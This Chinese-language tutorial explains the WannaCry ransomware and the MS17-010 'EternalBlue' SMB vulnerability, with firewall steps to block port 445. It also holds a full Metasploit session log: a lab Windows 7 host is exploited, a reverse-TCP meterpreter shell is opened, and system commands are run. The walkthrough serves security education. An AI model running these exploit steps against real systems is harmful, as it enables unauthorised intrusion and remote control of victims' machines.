WannaCry 主要利用的哪个漏洞进行攻击的？

WannaCry 主要利用的哪个漏洞进行攻击的？

背景及漏洞介绍

当用户主机系统被该勒索软件入侵后，弹出如下勒索对话框，提示勒索目的并向用户索要比特币。而对于用户主机上的重要文件，如：照片、图片、文档、压缩包、音频、视频、可执行程序等几乎所有类型的文件，都被加密的文件后缀名被统一修改为“.WNCRY”。安全业界暂未能有效破除该勒索软的恶意加密行为，用户主机一旦被勒索软件渗透，只能通过重装操作系统的方式来解除勒索行为，但用户重要数据文件不能直接恢复。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PU7ufNi8-1658668301856)(https://bkimg.cdn.bcebos.com/pic/203fb80e7bec54e7e2c7b02db4389b504fc26ade?x-bce-process=image/resize,m_lfit,w_1280,limit_1/format,f_auto)]

主要利用漏洞：

2017年5月12日，WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发，感染了大量的计算机，该蠕虫感染计算机后会向计算机中植入敲诈者病毒，导致电脑大量文件被加密。

WannaCry利用Windows操作系统445端口存在的漏洞进行传播，并具有自我复制、主动传播的特性。

，“永恒之蓝”是NSA泄露的漏洞利用工具的名称，并不是该病毒的名称#。永恒之蓝”是指NSA泄露的危险漏洞“EternalBlue”，此次的勒索病毒WannaCry是利用该漏洞进行传播的，当然还可能有其他病毒也通过“永恒之蓝”这个漏洞传播，因此给系统打补丁是必须的

演示“永恒之蓝”漏洞，也即MS17-010漏洞：

1.靶机IP地址

2.利用msf攻击

（1）搜索永恒之蓝exp

（2）设置ip地址

（3）攻击

（4）攻击成功

防御措施：

Win7、Win8、Win10的处理流程

1、打开控制面板-系统与安全-Windows防火墙，点击左侧启动或关闭Windows防火墙。

2、选择启动防火墙，并点击确定

3、点击高级设置

4、点击入站规则，新建规则

5、选择端口，下一步

6、特定本地端口，输入445，下一步

7、选择阻止连接，下一步

8、配置文件，全选，下一步

9、名称，可以任意输入，完成即可。

XP系统的处理流程

1、依次打开控制面板，安全中心，Windows防火墙，选择启用

2、点击开始，运行，输入cmd，确定执行下面三条命令：net stop rdr 、net stop srv 、net stop netbt

msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > search eternal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 5, use 5 or use exploit/windows/smb/smb_doublepulsar_rce                                                                                                                            

msf6 exploit(windows/browser/ms11_050_mshtml_cobjectelement) > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file w
                                             ith syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.35.137    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 172.16.35.136
lhost => 172.16.35.136
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.35.139
rhosts => 172.16.35.139
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 172.16.35.136:4444
[*] 172.16.35.139:445 - Executing automatic check (disable AutoCheck to override)
[*] 172.16.35.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.35.139:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.35.139:445     - Scanned 1 of 1 hosts (100% complete)
[+] 172.16.35.139:445 - The target is vulnerable.
[*] 172.16.35.139:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.35.139:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.35.139:445     - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.35.139:445 - Connecting to target for exploitation.
[+] 172.16.35.139:445 - Connection established for exploitation.
[+] 172.16.35.139:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.35.139:445 - CORE raw buffer dump (38 bytes)
[*] 172.16.35.139:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 172.16.35.139:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 172.16.35.139:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1         
[+] 172.16.35.139:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.35.139:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.35.139:445 - Sending all but last fragment of exploit packet
[*] 172.16.35.139:445 - Starting non-paged pool grooming
[+] 172.16.35.139:445 - Sending SMBv2 buffers
[+] 172.16.35.139:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.35.139:445 - Sending final SMBv2 buffers.
[*] 172.16.35.139:445 - Sending last fragment of exploit packet!
[*] 172.16.35.139:445 - Receiving response from exploit packet
[+] 172.16.35.139:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.35.139:445 - Sending egg to corrupted connection.
[*] 172.16.35.139:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 172.16.35.139
[*] Meterpreter session 1 opened (172.16.35.136:4444 -> 172.16.35.139:49159) at 2022-07-21 21:26:30 +0800
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.16.35.139:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > sysinfo
Computer        : WIN-50HM5UIKP60
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > ipconfig

Interface  1
============
Name         : Software Loopback Interface 1
Hardware MAC : 00:00:00:00:00:00
MTU          : 4294967295
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff


Interface 11
============
Name         : Intel(R) PRO/1000 MT Network Connection
Hardware MAC : 00:0c:29:78:c7:d1
MTU          : 1500
IPv4 Address : 172.16.35.139
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::2c4d:f99f:5511:8da8
IPv6 Netmask : ffff:ffff:ffff:ffff::


Interface 12
============
Name         : Microsoft ISATAP Adapter
Hardware MAC : 00:00:00:00:00:00
MTU          : 1280
IPv6 Address : fe80::5efe:ac10:238b
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff